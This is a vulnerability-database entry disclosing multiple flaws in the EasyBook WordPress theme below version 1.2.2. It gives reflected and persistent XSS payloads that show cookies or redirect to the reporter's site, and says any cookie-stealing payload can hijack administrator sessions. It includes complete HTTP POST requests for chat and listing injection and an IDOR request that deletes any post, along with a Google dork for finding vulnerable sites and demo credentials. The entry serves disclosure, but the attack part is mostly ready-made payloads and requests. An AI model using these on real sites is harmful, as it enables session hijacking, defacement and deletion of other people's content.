Lucene search
+L

EasyBook < 1.2.2 - Multiple Vulnerabilities

🗓️ 10 Jan 2020 00:00:00Reported by m0zeType 
wpexploit
 wpexploit
👁 40 Views

For EasyBook < 1.2.2, multiple vulnerabilities like Reflected XSS, Persistent XSS in Chat and Listing page exist. Demo and PoC available at the given URL

Related
Refs
Code
----[]- Info: -[]----
Demo website: https://www.easybook.cththemes.org/
Demo account: m0ze2/asdasd (login/password)
PoC listing: https://www.easybook.cththemes.org/dashboard/#/listingsPending
Google Dork: /wp-content/themes/easybook/
Date: 27/12/2019


----[]- Reflected XSS: -[]----
Input field with placeholder «Hotel , City...» on the homepage is vulnerable. Same thing with a regular search (block under the «Add Listing» button).

Payload Sample #0: <img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC #0: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&checkin=&checkout=&adults=1&children=0

PoC #1: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&checkin=&checkout=&adults=1&children=0


----[]- Persistent XSS -> Chat: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://www.easybook.cththemes.org/dashboard/#/chats or from chat widget on the bottom right corner).

Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_

action=easybook_addons_chat_reply&_nonce=1c8cd14288&cid=600&user_id=XXX&touid=1&reply_text=_payload_

Where:
user_id=XXX (your unique WordPress ID);
touid=1 (message receiver ID, in this example ID 1 == account «admin»);
reply_text=_payload_ (your payload).


----[]- Persistent XSS -> Listing page: -[]----
Add new listing here https://www.easybook.cththemes.org/dashboard/#/addListing (first time you need to order a «Free» plan and go to this URL again).
Vulnerable input fields: «Address», «Longitude», «Latitude», «Fact Title» and «Fact Number».

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------970149683563
Content-Length: 4142
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_

-----------------------------970149683563
Content-Disposition: form-data; name="lid"

0
-----------------------------970149683563
Content-Disposition: form-data; name="listing_type_id"

5058
-----------------------------970149683563
Content-Disposition: form-data; name="isSubmit"

true
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[timezone]"

America/New_York
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Monday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Tuesday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Wednesday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Thursday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Friday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Saturday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Sunday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="locations"

US|M
-----------------------------970149683563
Content-Disposition: form-data; name="title"

PoC
-----------------------------970149683563
Content-Disposition: form-data; name="address"

"><img src=x onerror=alert(1)>
-----------------------------970149683563
Content-Disposition: form-data; name="longitude"

"><img src=x onerror=alert(2)>
-----------------------------970149683563
Content-Disposition: form-data; name="latitude"

"><img src=x onerror=alert(3)>
-----------------------------970149683563
Content-Disposition: form-data; name="author_email"

M
-----------------------------970149683563
Content-Disposition: form-data; name="author_phone"

M
-----------------------------970149683563
Content-Disposition: form-data; name="author_website"

M
-----------------------------970149683563
Content-Disposition: form-data; name="content"

"><img src=x onerror=alert(document.domain)>
-----------------------------970149683563
Content-Disposition: form-data; name="features[0]"

303
-----------------------------970149683563
Content-Disposition: form-data; name="features[1]"

300
-----------------------------970149683563
Content-Disposition: form-data; name="features[2]"

305
-----------------------------970149683563
Content-Disposition: form-data; name="features[3]"

302
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][title]"

"><img src=x onerror=alert(9)>
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][number]"

"><img src=x onerror=alert(10)>
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][icon]"

123
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_id]"

-imgsrcxonerroralert12
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_name]"

M
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_desc]"

M
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_price]"

0
-----------------------------970149683563
Content-Disposition: form-data; name="action"

submit_listing
-----------------------------970149683563
Content-Disposition: form-data; name="_wpnonce"

1c8cd14288
-----------------------------970149683563--


----[]- IDOR: -[]----
Delete any post/page/listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_

action=easybook_addons_delete_listing&_nonce=1c8cd14288&lid=XXXX

Where:
lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jan 2021 20:36Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.03243
40